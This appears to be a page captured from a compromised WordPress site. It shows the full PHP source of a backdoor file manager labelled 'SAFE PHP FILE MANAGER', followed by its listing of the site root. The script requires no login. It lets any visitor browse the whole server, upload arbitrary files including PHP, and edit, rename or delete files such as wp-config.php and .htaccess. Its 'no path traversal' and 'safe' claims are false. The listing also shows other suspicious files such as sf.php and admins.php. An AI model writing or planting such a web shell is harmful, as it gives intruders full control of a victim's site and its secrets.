ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ

PATH: home / pallya5 / swiftcleaningng.com

<?php
/* =====================================================
   SAFE PHP FILE MANAGER
   - Anti 0 KB write
   - Safe edit / upload / delete / rename
   - No directory delete
   - No path traversal
===================================================== */

error_reporting(E_ALL);
ini_set('display_errors', 1);

/* ================= PATH ================= */
$cwd = getcwd();
if (isset($_GET['p'])) {
    $real = realpath($_GET['p']);
    if ($real !== false && is_dir($real)) {
        $cwd = $real;
    }
}

/* ================= BREADCRUMB ================= */
function nav(string $dir): string {
    $parts = explode(DIRECTORY_SEPARATOR, $dir);
    $path = '';
    $out  = [];

foreach ($parts as $p) {
        if ($p === '') continue;
        $path .= DIRECTORY_SEPARATOR . $p;
        $out[] = '<a href="?p=' . urlencode($path) . '">' . htmlspecialchars($p) . '</a>';
    }
    return implode(' / ', $out);
}

$msg = '';

/* ================= SAVE FILE (ANTI 0 KB) ================= */
if (isset($_POST['save'], $_POST['file'], $_POST['content'])) {

$file   = basename($_POST['file']);
    $target = $cwd . DIRECTORY_SEPARATOR . $file;

if (is_file($target) && is_writable($target)) {

$tmp = $target . '.tmp_' . uniqid('', true);
        $bytes = file_put_contents($tmp, $_POST['content'], LOCK_EX);

if ($bytes !== false && filesize($tmp) > 0) {
            rename($tmp, $target);
            $msg = 'File saved successfully.';
        } else {
            @unlink($tmp);
            $msg = 'Write failed. File NOT modified.';
        }
    } else {
        $msg = 'File not writable.';
    }
}

/* ================= UPLOAD ================= */
if (!empty($_FILES['upload']['name'])) {

if ($_FILES['upload']['error'] === UPLOAD_ERR_OK) {

$name = basename($_FILES['upload']['name']);
        $dest = $cwd . DIRECTORY_SEPARATOR . $name;

if (!file_exists($dest) && move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) {
            $msg = 'Upload successful.';
        } else {
            $msg = 'Upload failed or file exists.';
        }
    } else {
        $msg = 'Upload error.';
    }
}

/* ================= DELETE FILE ================= */
if (isset($_POST['delete'], $_POST['file'])) {

$file   = basename($_POST['file']);
    $target = $cwd . DIRECTORY_SEPARATOR . $file;

if (is_file($target) && is_writable($target)) {
        unlink($target);
        $msg = 'File deleted successfully.';
    } else {
        $msg = 'File not deletable.';
    }
}

/* ================= RENAME FILE ================= */
if (isset($_POST['rename'], $_POST['old'], $_POST['new'])) {

$old = basename($_POST['old']);
    $new = basename($_POST['new']);

$oldPath = $cwd . DIRECTORY_SEPARATOR . $old;
    $newPath = $cwd . DIRECTORY_SEPARATOR . $new;

if ($new === '') {
        $msg = 'New filename cannot be empty.';
    } elseif (!is_file($oldPath)) {
        $msg = 'Source file not found.';
    } elseif (file_exists($newPath)) {
        $msg = 'Target filename already exists.';
    } elseif (rename($oldPath, $newPath)) {
        $msg = 'File renamed successfully.';
    } else {
        $msg = 'Rename failed.';
    }
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ</title>
<style>
body { background:#111;color:#eee;font-family:Arial;font-size:14px }
a { color:#6cf;text-decoration:none }
textarea,input { background:#222;color:#eee;border:1px solid #444 }
ul { list-style:none;padding-left:0 }
li { margin:6px 0 }
.msg { color:#9f9;margin:10px 0 }
.small { font-size:12px;color:#aaa }
</style>
</head>
<body>

<?php if ($msg): ?>
<div class="msg"><?= htmlspecialchars($msg); ?></div>
<?php endif; ?>

<hr>

<?php
/* ================= EDIT MODE ================= */
if (isset($_GET['e'])) {

$file = basename($_GET['e']);
    $path = $cwd . DIRECTORY_SEPARATOR . $file;

if (is_file($path) && is_readable($path)) {

$content = htmlspecialchars(file_get_contents($path));
        ?>
        <form method="post">
            <textarea name="content" rows="20" cols="100"><?= $content ?></textarea><br>
            <input type="hidden" name="file" value="<?= htmlspecialchars($file) ?>">
            <input type="submit" name="save" value="Save">
        </form>
        <hr>
        <?php
    }
}

/* ================= FILE LIST ================= */
$h = opendir($cwd);
echo '<ul>';

while (($i = readdir($h)) !== false) {

if ($i === '.') continue;
    $p = $cwd . DIRECTORY_SEPARATOR . $i;

if (is_dir($p)) {

echo '<li>[+] <a href="?p=' . urlencode($p) . '">' . htmlspecialchars($i) . '</a></li>';

} else {

echo '<li>[-] ' . htmlspecialchars($i) . '
        <a href="?e=' . urlencode($i) . '&p=' . urlencode($cwd) . '">[edit]</a>

<form method="post" style="display:inline"
            onsubmit="return confirm(\'Delete file ' . htmlspecialchars($i) . '?\')">
            <input type="hidden" name="file" value="' . htmlspecialchars($i) . '">
            <input type="submit" name="delete" value="delete">
        </form>
        </li>';
    }
}

closedir($h);
echo '</ul>';
?>

</body>
</html>

[-] robots.txt [edit]
[-] wp-signup.php [edit]
[-] .htaccess [edit]
[-] googlea11b23045a5676f2.html [edit]
[-] wp-links-opml.php [edit]
[-] 2.txt [edit]
[+] wp-includes
[-] wp-blog-header.php [edit]
[-] wp-config.php [edit]
[-] wp-settings.php [edit]
[+] .tmb
[+] .well-known
[-] wp-login.php [edit]
[-] wp-cron.php [edit]
[-] sf.php [edit]
[-] readme.html [edit]
[-] zblocker.php [edit]
[-] wp-activate.php [edit]
[-] admins.php [edit]
[-] test_php.php [edit]
[-] wp-trackback.php [edit]
[-] 1.txt [edit]
[-] wp-config-sample.php [edit]
[-] wp-comments-post.php [edit]
[+] wp-admin
[-] wp-mail.php [edit]
[-] .htaccess_251227160449 [edit]
[+] ..
[-] wp-load.php [edit]
[-] xmlrpc.php [edit]
[-] php.ini [edit]
[+] wp-content
[-] license.txt [edit]